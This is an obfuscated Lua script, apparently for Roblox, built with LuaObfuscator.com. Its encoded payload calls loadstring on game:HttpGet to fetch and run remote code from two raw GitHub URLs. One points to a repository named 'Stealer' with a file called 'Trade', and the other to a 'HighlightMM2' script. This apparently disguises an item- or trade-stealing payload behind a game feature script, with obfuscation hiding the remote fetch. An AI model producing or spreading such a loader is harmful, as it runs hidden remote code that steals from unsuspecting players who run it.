--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v80,v19);v19=nil;v91=1;end end else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(1637 -(1523 + 114)) -0 ;local v82;while true do if (v81==0) then v82=(v31/((5 -3)^(v32-(1 -0))))%(((4 + 0) -2)^(((v33-(620 -((790 -235) + 64))) -(v32-(932 -(857 + 74)))) + 1)) ;return v82-(v82%(569 -(367 + 201))) ;end end else local v83=927 -(214 + 713) ;local v84;while true do if (v83==0) then v84=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (877 -(282 + 595)) ;end end end end local function v21() local v34=1065 -(67 + 1 + 997) ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 232 + 812)) ;v34=4 -3 ;end if (v34==(118 -(32 + 85))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * ((45170883 -28393317) -((157 -70) + 263))) + (v41 * (65716 -(67 + 113))) + (v40 * (137 + 51 + (1065 -(915 + 82)))) + v39 ;end if (0==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -(11 -7)) );v18=v18 + 3 + 1 ;v38=3 -(954 -(802 + 150)) ;end end end local function v24() local v43=v23();local v44=v23();local v45=(2567 -(1020 + 60)) -(998 + 488) ;local v46=(v20(v44,1 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^((1495 -(630 + 793)) -40))) + v43 ;local v47=v20(v44,45 -24 ,6 + 25 );local v48=((v20(v44,56 -24 )==1) and  -(1139 -(116 + 1022))) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==((0 -0) -0)) then return v48 * (0 -0) ;else local v93=0;while true do if (v93==(18 -(10 + 8))) then v47=3 -2 ;v45=442 -((1969 -1553) + 26) ;break;end end end elseif (v47==(5043 -2996)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1461 -(145 + 116 + 177)) ) * (v45 + (v46/((432 -(44 + (1328 -942)))^(92 -40)))) ;end local function v25(v49) local v50=1747 -((2577 -(1703 + 114)) + 987) ;local v51;local v52;while true do if (v50==(703 -(376 + 325))) then v52={};for v94=(3327 -(447 + 966)) -(1789 + 124) , #v51 do v52[v94]=v2(v1(v3(v51,v94,v94)));end v50=769 -(745 + 21) ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v104=0 -(0 -0) ;while true do if (v104==(0 -0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=1 + 0 ;end if (v50==(1058 -(87 + 968))) then return v6(v52);end if ((4 -(4 -1))==v50) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=4 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53== #"}") then local v87=(function() return 0;end)();local v88=(function() return;end)();while true do if (v87~=0) then else v88=(function() return 0 -0 ;end)();while true do if (v88==0) then v58=(function() return v23();end)();v59=(function() return {};end)();v88=(function() return 1;end)();end if (v88==1) then for v116= #">",v58 do local v117=(function() return 0;end)();local v118=(function() return;end)();local v119=(function() return;end)();local v120=(function() return;end)();while true do if ((2 -1)~=v117) then else v120=(function() return nil;end)();while true do if (v118~=1) then else if (v119== #"\\") then v120=(function() return v21()~=(1636 -(1373 + 263)) ;end)();elseif (v119==(1002 -(451 + 549))) then v120=(function() return v24();end)();elseif (v119== #"91(") then v120=(function() return v25();end)();end v59[v116]=(function() return v120;end)();break;end if (v118==0) then v119=(function() return v21();end)();v120=(function() return nil;end)();v118=(function() return 1;end)();end end break;end if (v117~=0) then else v118=(function() return 0 + 0 ;end)();v119=(function() return nil;end)();v117=(function() return 1;end)();end end end v57[ #"asd"]=(function() return v21();end)();v88=(function() return 2;end)();end if (v88==(2 -0)) then v53=(function() return 2;end)();break;end end break;end end end if (v53==(2 -0)) then for v96= #"[",v23() do local v97=(function() return v21();end)();if (v20(v97, #"}", #".")==(1384 -(746 + 638))) then local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107~=(1 + 1)) then else if (v20(v109, #".", #"[")== #"<") then v110[2]=(function() return v59[v110[2 -0 ]];end)();end if (v20(v109,343 -(218 + 123) ,1583 -(1535 + 46) )== #".") then v110[ #"gha"]=(function() return v59[v110[ #"xnx"]];end)();end v107=(function() return 3;end)();end if (v107==1) then local v112=(function() return 0 + 0 ;end)();local v113=(function() return;end)();while true do if ((0 + 0)==v112) then v113=(function() return 560 -(306 + 254) ;end)();while true do if (v113==1) then v107=(function() return 1 + 1 ;end)();break;end if (v113~=0) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v168=(function() return 1467 -(899 + 568) ;end)();local v169=(function() return;end)();while true do if (v168==(0 + 0)) then v169=(function() return 0 -0 ;end)();while true do if (v169==0) then v110[ #"nil"]=(function() return v22();end)();v110[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"!") then v110[ #"nil"]=(function() return v23();end)();elseif (v108==2) then v110[ #"91("]=(function() return v23() -((605 -(268 + 335))^(306 -(60 + 230))) ;end)();elseif (v108~= #"gha") then else local v184=(function() return 572 -(426 + 146) ;end)();local v185=(function() return;end)();while true do if ((0 + 0)~=v184) then else v185=(function() return 0;end)();while true do if (v185==0) then v110[ #"91("]=(function() return v23() -((1458 -(282 + 1174))^(827 -(569 + 242))) ;end)();v110[ #"0313"]=(function() return v22();end)();break;end end break;end end end v113=(function() return 2 -1 ;end)();end end break;end end end if (v107~=0) then else local v114=(function() return 0;end)();while true do if (v114==0) then local v124=(function() return 0;end)();while true do if ((1 + 0)==v124) then v114=(function() return 1;end)();break;end if (v124==(1024 -(706 + 318))) then v108=(function() return v20(v97,1253 -(721 + 530) , #"xxx");end)();v109=(function() return v20(v97, #"xnxx",6);end)();v124=(function() return 1;end)();end end end if (v114~=1) then else v107=(function() return 1;end)();break;end end end if ((1274 -(945 + 326))==v107) then if (v20(v109, #"-19", #"xxx")~= #".") then else v110[ #".com"]=(function() return v59[v110[ #"http"]];end)();end v54[v96]=(function() return v110;end)();break;end end end end for v98= #"\\",v23() do v55[v98-#"/" ]=(function() return v28();end)();end return v57;end if (v53==(0 -0)) then local v89=(function() return 0 + 0 ;end)();local v90=(function() return;end)();while true do if (0==v89) then v90=(function() return 0;end)();while true do if (v90==(700 -(271 + 429))) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 1;end)();end if (v90~=(2 + 0)) then else v53=(function() return  #"[";end)();break;end if (v90==1) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 2;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1087 -(461 + 625) ];local v64=v60[2];local v65=v60[1291 -(993 + 295) ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1 + 0 ;local v71= -(1172 -(142 + 276 + 753));local v72={};local v73={...};local v74=v12("#",...) -(1 + 0) ;local v75={};local v76={};for v85=0,v74 do if ((v85>=v68) or (4557<=2087)) then v72[v85-v68 ]=v73[v85 + 1 + 0 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0 + (1202 -(373 + 829)) ;while true do if ((530 -(406 + (854 -(476 + 255))))==v86) then if ((3874==3874) and (v79<=9)) then if (v79<=(1773 -(1749 + 20))) then if ((v79<=(1 + 0)) or (1938>4935)) then if (v79>(1322 -(1249 + 73))) then if ((v76[v78[1 + 1 ]]==v78[4]) or (4255<3423)) then v70=v70 + (1146 -(466 + 679)) ;else v70=v78[(1136 -(369 + 761)) -3 ];end else v76[v78[2]]=v62[v78[8 -5 ]];end elseif (v79<=(1902 -(106 + 1794))) then v70=v78[1 + 2 + 0 ];elseif (v79==(1 + 2)) then for v162=v78[2],v78[8 -(9 -4) ] do v76[v162]=nil;end else local v148=0;local v149;while true do if ((0 -0)==v148) then v149=v78[116 -(4 + 110) ];v76[v149]=v76[v149](v13(v76,v149 + (585 -(57 + 527)) ,v71));break;end end end elseif (v79<=(1433 -(41 + 1386))) then if ((1454<=2491) and (v79>(108 -(17 + 86)))) then v76[v78[2 + 0 ]]=v62[v78[6 -3 ]];else local v130=(0 -0) -0 ;local v131;local v132;local v133;local v134;while true do if ((v130==(166 -(122 + 44))) or (4157<=2803)) then v131=v78[2 -(238 -(64 + 174)) ];v132,v133=v69(v76[v131](v13(v76,v131 + (3 -2) ,v78[3])));v130=1 + 0 ;end if ((4853>=2982) and (v130==(1 + 1))) then for v170=v131,v71 do local v171=0 -0 ;while true do if ((4134>3357) and (v171==0)) then v134=v134 + (66 -(30 + 5 + 30)) ;v76[v170]=v132[v134];break;end end end break;end if (v130==(1 + 0)) then v71=(v133 + v131) -((1862 -604) -(1043 + 214)) ;v134=0 -0 ;v130=1214 -((659 -(144 + 192)) + 889) ;end end end elseif (v79<=(18 -(227 -(42 + 174)))) then v76[v78[582 -(361 + 219) ]]();elseif (v79==(328 -(53 + 267))) then v76[v78[1 + 1 ]]=v78[(313 + 103) -(15 + 398) ];else local v152=v78[984 -(18 + 799 + 165) ];v76[v152]=v76[v152](v13(v76,v152 + (3 -2) ,v71));end elseif (v79<=14) then if (v79<=(7 + 4)) then if ((v79==(7 + 2 + 1)) or (3417<2534)) then local v135=850 -(20 + 830) ;local v136;local v137;local v138;local v139;while true do if ((v135==((1506 -(363 + 1141)) + 0)) or (2722<=164)) then for v172=v136,v71 do local v173=126 -(116 + 10) ;while true do if (v173==(0 + 0)) then v139=v139 + (739 -(542 + 196)) ;v76[v172]=v137[v139];break;end end end break;end if ((v135==(0 -0)) or (2408<2109)) then v136=v78[1 + 1 ];v137,v138=v69(v76[v136](v13(v76,v136 + 1 + 0 ,v78[2 + 1 ])));v135=(1582 -(1183 + 397)) -1 ;end if ((2 -1)==v135) then v71=(v138 + v136) -(1552 -((3427 -2301) + 425)) ;v139=405 -(118 + 211 + 76) ;v135=7 -5 ;end end else v76[v78[1123 -(118 + 1003) ]]();end elseif (v79<=12) then local v140=v78[5 -3 ];local v141=v76[v78[3]];v76[v140 + (378 -(142 + 235)) ]=v141;v76[v140]=v141[v78[4]];elseif (v79==(58 -45)) then local v154=v78[1 + 1 ];local v155=v76[v78[3 + 0 ]];v76[v154 + (978 -(553 + 424)) ]=v155;v76[v154]=v155[v78[7 -3 ]];else v70=v78[3 + 0 ];end elseif (v79<=(16 + 0)) then if (v79>((1984 -(1913 + 62)) + 6)) then if (v76[v78[1 + 1 + 0 ]]==v78[3 + 1 ]) then v70=v70 + ((5 -3) -1) ;else v70=v78[3];end else v76[v78[5 -3 ]]=v78[6 -3 ];end elseif (v79<=(5 + 12)) then do return;end elseif (v79>18) then for v166=v78[9 -7 ],v78[756 -(239 + 514) ] do v76[v166]=nil;end else do return;end end v70=v70 + 1 + 0 ;break;end if ((v86==0) or (33==1455)) then v78=v66[v70];v79=v78[(3263 -(565 + 1368)) -(797 + 532) ];v86=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5461646173682D31302F537465616C65722F6D61696E2F547261646503413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F546861745369636B2F486967686C696768742O4D322F6D61696E2F4D61696E001A3O00120F3O00014O0003000100013O0026103O0002000100010004023O0002000100120F000100013O00261000010005000100010004023O0005000100122O000200023O00122O000300033O00200C00030003000400120F000500054O0005000300054O000400023O00022O000B00020001000100122O000200023O00122O000300033O00200C00030003000400120F000500064O0005000300054O000400023O00022O000B0002000100010004023O001900010004023O000500010004023O001900010004023O000200012O00123O00017O00",v9(),...);
